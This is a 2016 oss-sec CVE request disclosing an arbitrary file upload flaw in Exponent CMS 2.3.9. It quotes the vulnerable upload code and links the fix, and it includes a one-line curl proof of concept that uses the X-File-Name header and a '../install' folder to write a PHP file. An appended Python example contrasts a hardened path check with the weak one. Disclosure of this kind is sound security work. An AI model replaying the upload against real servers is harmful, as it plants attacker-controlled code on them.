oss-sec mailing list archives

CVE request: Exponent CMS 2.3.9 Arbitrary File Upload vulnerability in expFile.php


From: Carl Peng <felixk3y () gmail com>
Date: Wed, 21 Sep 2016 08:10:39 +0800

Hi, I reported the following Arbitrary File Upload vulnerability to the
ExponentCMS team on Sep 13, 2016:
vulnerability:
https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/file/controllers/fileController.php#L570-L592
```
if (!empty($this->params['folder']) || (defined('QUICK_UPLOAD_FOLDER') && QUICK_UPLOAD_FOLDER != '' && QUICK_UPLOAD_FOLDER != 0)) {
    // prevent attempt to place file somewhere other than /files folder
    if (!empty($this->params['folder']) && strpos($this->params['folder'], '..') !== false) {
        $ar = new expAjaxReply(300, gt("File was not uploaded!"));
        $ar->send();
    }
    if (SITE_FILE_MANAGER == 'picker') {
        $quikFolder = !empty($this->params['folder']) ? $this->params['folder'] : QUICK_UPLOAD_FOLDER;
        $destDir = null;
    } elseif (SITE_FILE_MANAGER == 'elfinder') {
        $quikFolder = null;
        $destDir = UPLOAD_DIRECTORY_RELATIVE . (!empty($this->params['folder']) ? $this->params['folder'] : QUICK_UPLOAD_FOLDER) . '/';
        // create folder if non-existent
        expFile::makeDirectory($destDir);
    }
} else {
    $quikFolder = null;
    $destDir = null;
}
//extensive suitability check before doing anything with the file...
if (isset($_SERVER['HTTP_X_FILE_NAME'])) {  //HTML5 XHR upload
    $file = expFile::fileXHRUpload($_SERVER['HTTP_X_FILE_NAME'], false, false, null, $destDir, intval(QUICK_UPLOAD_WIDTH));
    //here File Upload vulnerability
    $file->poster = $user->id;
```
The "folder" parameter and "$_SERVER['HTTP_X_FILE_NAME']" may both be
submitted by the user.

expFile::fileXHRUpload():
https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/file/models/expFile.php#L526
```
$_destFile = ($_destFile == null) ? self::fixName($fileName) : $_destFile;
// "fileName" parameter may be submitted by the user
// ...
$maxwidth = intval($_max_width);
if (!empty($maxwidth)) {
    // ...
} else {
    file_put_contents($_destFullPath, file_get_contents('php://input', 'r')); // line 572
}
```

Proof of concept:
```
curl -H "X-File-Name: e.php" -d "controller=file&action=quickUpload&code=<?php phpinfo();?>&folder=../install" http://www.exponentcms.org/index.php
```

http://www.exponentcms.org/install/e.php


This vulnerability has now been fixed:
https://exponentcms.lighthouseapp.com/projects/61783/changesets/355702a9835cf527796c9d469a82258b7639148a
https://github.com/exponentcms/exponent-cms/commit/355702a9835cf527796c9d469a82258b7639148a

This issue was reported by Peng Hua of silence.com.cn Inc. and I would like
to request a CVE for this issue (if not done so).

Thank you.
---------------------------------
http://www.silence.com.cn
penghua#silence.com.cn
PKAV Team
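The guard quoted above only scans the "folder" parameter for the substring ".." and never looks at the X-File-Name value that becomes the destination file name. The following is an added illustration, not code from the advisory or from Exponent CMS, of what a hardened upload path check looks like next to the original one-line guard; UPLOAD_ROOT, the extension allowlist and the sample requests are constructed for this example.

```python
import posixpath

# Constructed settings for this illustration; not Exponent's real constants or paths.
UPLOAD_ROOT = "/var/www/files"
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}


def weak_folder_check(folder: str) -> bool:
    """Mirror of the guard in the quoted fileController: a '..' substring test
    on the folder only. The file name (X-File-Name) is never inspected."""
    return ".." not in folder


def resolve_upload_target(folder: str, file_name: str) -> str:
    """Return the absolute destination path for an upload, or raise ValueError.

    Hardened counterpart of the quoted code: the client-supplied name is cut
    down to a basename and its extension is allowlisted, and the folder is
    normalised and then checked to lie under UPLOAD_ROOT instead of merely
    being scanned for the substring '..'.
    """
    if "\x00" in folder or "\x00" in file_name:
        raise ValueError("NUL byte in input")
    # Basename only: path separators of either flavour in X-File-Name are dropped.
    base = posixpath.basename(file_name.replace("\\", "/"))
    if base in ("", ".", ".."):
        raise ValueError("empty file name")
    stem, dot, ext = base.rpartition(".")
    if not dot or not stem or ext.lower() not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not allowed: " + base)
    # An absolute folder would make join() discard UPLOAD_ROOT entirely.
    if folder.startswith(("/", "\\")):
        raise ValueError("absolute folder rejected")
    target = posixpath.normpath(posixpath.join(UPLOAD_ROOT, folder.replace("\\", "/"), base))
    # Containment test on the normalised path catches '..' however it is spelled.
    if not target.startswith(UPLOAD_ROOT + "/"):
        raise ValueError("folder escapes upload root: " + folder)
    return target


def check_request(folder: str, x_file_name: str) -> dict:
    """Evaluate one quickUpload-style request with both checks side by side."""
    try:
        verdict = "accept:" + resolve_upload_target(folder, x_file_name)
    except ValueError as exc:
        verdict = "reject:" + str(exc)
    return {"weak_folder_check": weak_folder_check(folder), "hardened": verdict}


if __name__ == "__main__":
    # Constructed requests: the advisory's PoC shape, a name-only variant, a benign one.
    for folder, name in (("../install", "e.php"), ("", "e.php"), ("docs", "report.pdf")):
        print(repr(folder), name, check_request(folder, name))
```

The second sample request shows the gap: with no folder at all the original guard is satisfied, yet a ".php" name from X-File-Name would still be written verbatim.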
